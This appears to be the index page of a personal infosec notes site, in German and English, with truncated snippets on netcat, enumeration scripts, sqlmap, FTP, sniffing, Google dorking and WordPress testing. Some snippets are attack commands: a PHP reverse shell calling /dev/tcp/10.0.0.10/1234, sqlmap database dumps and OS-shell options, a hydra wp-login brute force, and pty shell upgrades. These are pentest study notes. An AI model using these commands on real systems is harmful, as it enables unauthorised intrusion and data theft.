Routing-Tabelle ansehen netstat -r Schnelle Ausgabe ohne DNS-Auflösung, nur IPs: netstat -n Nur TCP-Verbindungen anzeigen netstat -t Nur UDP-Verbindungen anzeigen netstat -u Programm anzeigen, dass offene Verbindung benutzt netstat -p Netzwerkstatistik anzeigen netstat -s
Namenskonfusion Datei ausliefern: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Datei anfragen über SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Gebe Ausgabe von Programm zurück: ncat -l localhost 3000 --exec /bin/date Datei direkt übertragen (unverschlüsselt!): 1. Empfänger: user@host02:~$ ncat -l > aha oder nc -nlvp 4444…
https://github.com/diego-treitos/linux-smart-enumeration This script will show relevant information about the security of the local Linux system. Quick install Details from the manual It has 3 levels of verbosity so you can control how much information you see. In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1)…
IF THE METERPRETER SHELL STUCKS, TRY TO ENTER ENTER MULTIPLE TIMES ON THE VICTIM. Aufbauen Lausche auf einem System, dass erreicht werden kann z.B. mit nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution] Initiiere dann die Verbindung vom Zielsystem. Hier ein Beispiel direkt in PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?> Anderes Beispiel, z.B. direkt in einer Konsole…
Standard case: $ python sqlmap.py -u http://10.10.10.140/index.php/catalogsearch/result/?q=e More aggresive: Dump DB: sqlmap -u http://target/command.php?id=564 --dbms=mysql --dump --threads=5 sqlmap -u http://target/command.php?id=564 --dbms=mysql --tables Get shell: sqlmap -u http://target/command.php?id=564 --dbms=mysql --os-shell Use an existing HTTP request as template. E.g. store a request in a text file: POST /index.php HTT/1.1Header: value... Then, use sqlmap with this file request.txt: sqlmap -r…
With knockd a server can be configured to respond only after some ports were checked before. Its often used for SSH. Coutermeasure: Sniff traffic and wait for an user to login and reconstruct the knocking pattern out of the pcaps.
Note that FTP doesn’t show hidden files! Try in Windows e.g “cd ProgramData”. Enumeration With nmap. Scans a network for ftp servers which allow anonymous access. nmap -v -p21 --script=ftp-anon.nse 10.11.1.1-254 FTP relays The FTP specification defines FTP relays. One FTP server can say to another FTP server to send files to another third-party server.…
General notes NC / Netcat Try netcat first on interesting ports or narrow port ranges to be more silent Network scan Choose a port which is probably open on systems on this network. E.g. 445 for Windows hosts or 22 for Linux hosts. for i in $(seq 1 254); do nc -zv -w 1 10.10.10.$i 445;…
Linux Detect IPv6 hosts There is no arp table like in Ethernet/IPv4. But we can simulate is as follows to list all neightbours / directly reachable hosts: ping6 -c 5 ff02::1%eth0 >/dev/null ip -6 neigh Bonus: ip neigh shows the IPv4 address resolution table like the arp command does. Detect IPv6 addresses for known IPv4 addresses Scenario:…
Like OSXcollector, but for Windows. Collects information on a host for later analyzation. https://www.fireeye.com/services/freeware/redline.html
osxcollector http://yelp.github.io/osxcollector/ Stand alone python script. Execute it on a Mac which should be analysed. It creates an archive with “everything” interessting which the victim can hand over an expert. See redline for Windows
See also the Wireshark post PSnuffle Metasploit module; analyse the live traffic for credentials of various protocols. msf > use auxiliary/sniffer/psnuffle PCredz PCredz uses a PCAP file and extracts hashes and other credentials. pcredz -f dump.pcap Zeek GitHub — zeek/zeek: Zeek is a powerful network analysis framework that is much different from the typical IDS you…
Sniffing and live content filtering. Operation modes: Unified: sniffs all packets from one interface. Packets for an attack host are ending here, but are directly forwarded after receiving Bridget: Forwards traffic from one interface to another. Absolutely secret because there is really no one “between the cable” Usage ettercap OPTIONS TARGET1 TARGET2 Targets are defined as MAC/IPv4s/IPv6s/PORT…
Passive OS fingerprinting http://tools.kali.org/information-gathering/p0f
Distributed port scanning. Install dnmap_client on many machines and install one dnsmap_server. The server controls the clients to split port scans. http://tools.kali.org/information-gathering/dnmap
Active Information Gathering tool. See http://tools.kali.org/information-gathering/dmitry
Analyses SSL https://github.com/nabla-c0d3/sslyze python ‑m sslyze –regular URL
=> https://www.exploit-db.com/google-hacking-database => https://ahrefs.com/blog/google-advanced-search-operators/ => https://searchdns.netcraft.com/ Github Search for file names within repos of users: user:megacorpone filename:users Tools Google Looking for directory listings: site:URL intitle:index.of Looking for configuration files: site:URL ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini Looking for datebase files: site:URL ext:sql | ext:dbf |…
Enumeration Github wpscan --url $target Maybe an API token could be useful — then, the WordPress Vulnerability Database is used. Login brute force hydra -l thinc -P best110.txt 10.11.1.234 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Check users: http://spectra.htb/main/?author=1 http://spectra.htb/main/?author=2 … Most beautiful wordpress plugin XSS injection If there is a way to inject code somewhere (e.g. via a plugin)…
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';